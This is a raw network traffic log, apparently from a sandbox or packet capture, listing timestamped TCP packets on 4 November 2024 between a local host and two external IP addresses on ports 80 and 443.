Nov 4, 2024 17:32:16.632641077 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.632653952 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.632666111 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.632693052 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.632714987 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.632803917 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.632814884 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.632824898 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.632847071 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.632862091 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.633127928 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.633167982 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.633171082 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.633178949 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.633261919 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.633280993 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.633312941 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.633527994 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.633573055 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.633578062 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.633590937 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.633615971 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.633761883 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.633774042 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.633785963 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.633814096 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.633830070 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.691499949 CET	443	49997	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.692035913 CET	49997	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.692065001 CET	443	49997	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.692498922 CET	49997	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.692504883 CET	443	49997	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.718497038 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.718509912 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.718599081 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.734977007 CET	443	49996	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.735049963 CET	443	49996	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.735120058 CET	49996	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.735285997 CET	49996	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.735306025 CET	443	49996	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.735338926 CET	49996	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.735346079 CET	443	49996	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.743271112 CET	443	49998	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.750044107 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.750058889 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.750071049 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.750133038 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.750164032 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.750320911 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.750372887 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.750375032 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.750386953 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.750411034 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.750430107 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.750463009 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.750503063 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.750526905 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.750540018 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.750551939 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.750567913 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.750595093 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.751204014 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.751255035 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.751276016 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.751296043 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.751321077 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.751343966 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.751395941 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.751408100 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.751419067 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.751435995 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.751465082 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.766836882 CET	49998	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.766849041 CET	443	49998	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.767462015 CET	49998	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.767467976 CET	443	49998	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.822675943 CET	443	49997	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.822875023 CET	443	49997	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.822961092 CET	49997	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.823007107 CET	49997	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.823007107 CET	49997	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.823033094 CET	443	49997	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.823044062 CET	443	49997	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.867548943 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.867677927 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.867685080 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.867697954 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.867711067 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.867722988 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.867731094 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.867737055 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.867748022 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.867758036 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.867786884 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.867834091 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.867857933 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.867867947 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.867876053 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.867897987 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.867904902 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.867913961 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.867932081 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.867933035 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.867959023 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.867963076 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.867978096 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.868006945 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.868376970 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.868427992 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.868429899 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.868443012 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.868469000 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.868484974 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.868505001 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.868516922 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.868527889 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.868549109 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.868572950 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.893668890 CET	443	49998	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.893743992 CET	443	49998	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.893793106 CET	49998	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.894007921 CET	49998	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.894022942 CET	443	49998	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.894042969 CET	49998	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.894047976 CET	443	49998	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.985004902 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.985052109 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.985064030 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.985078096 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.985094070 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.985106945 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.985107899 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.985136986 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.985148907 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.985167980 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.985202074 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.985213041 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.985219002 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.985241890 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.985272884 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.985320091 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.985332012 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.985342026 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.985351086 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.985356092 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.985434055 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.985445023 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.985472918 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.985874891 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.985923052 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.985929966 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.985938072 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.985965967 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.986025095 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.986037016 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.986069918 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.986329079 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.986368895 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.986387014 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.986418009 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.102091074 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.102117062 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.102128983 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.102139950 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.102159977 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.102205992 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.102227926 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.102355003 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.102395058 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.102423906 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.102442980 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.102458954 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.102494955 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.102500916 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.102592945 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.102653027 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.102664948 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.102675915 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.102694988 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.103061914 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.103064060 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.103064060 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.103065014 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.103091955 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.103101969 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.103104115 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.103132010 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.103168011 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.103231907 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.103270054 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.145926952 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.145939112 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.146043062 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.219480991 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.219510078 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.219540119 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.219541073 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.219553947 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.219564915 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.219571114 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.219583035 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.219603062 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.219640970 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.219948053 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.220000029 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.220005035 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.220019102 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.220033884 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.220048904 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.220079899 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.220099926 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.220159054 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.220200062 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.220213890 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.220231056 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.220237970 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.220246077 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.220258951 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.220268011 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.220294952 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.220532894 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.220546961 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.220561028 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.220570087 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.220587015 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.220603943 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.220681906 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.220695019 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.220721006 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.305862904 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.305939913 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.306030035 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.306076050 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.337054968 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.337076902 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.337090015 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.337111950 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.337137938 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.337357998 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.337407112 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.337426901 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.337436914 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.337471008 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.337492943 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.337517977 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.337532043 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.337542057 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.337568998 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.337584019 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.337611914 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.337651968 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.337675095 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.337691069 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.337724924 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.337733984 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.337779999 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.337791920 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.337827921 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.338062048 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.338108063 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.338121891 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.338121891 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.338146925 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.338156939 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.338310957 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.338350058 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.338355064 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.338363886 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.338386059 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.338397980 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.338444948 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.338455915 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.338485003 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.338850975 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.338901043 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.338939905 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.338984013 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.453711987 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.453742981 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.453768969 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.453779936 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.453809023 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.453826904 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.453838110 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.453885078 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.454185009 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.454207897 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.454229116 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.454256058 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.454374075 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.454413891 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.454413891 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.454423904 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.454468012 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.454468012 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.454487085 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.454505920 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.454520941 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.454554081 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.454588890 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.454746962 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.454786062 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.454813004 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.454847097 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.454870939 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.454910994 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.454926968 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.454943895 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.454962969 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.454983950 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.455030918 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.455044031 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.455066919 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.455080032 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.455375910 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.455425978 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.455441952 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.455460072 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.455473900 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.455475092 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.455502987 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.455749035 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.455769062 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.455796957 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.455817938 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.497817993 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.497847080 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.497859955 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.497932911 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.497961044 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.570811987 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.570852041 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.570866108 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.570925951 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.570960999 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.571217060 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.571259975 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.571271896 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.571285963 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.571336031 CET	49990	80	192.168.2.5	185.215.113.16
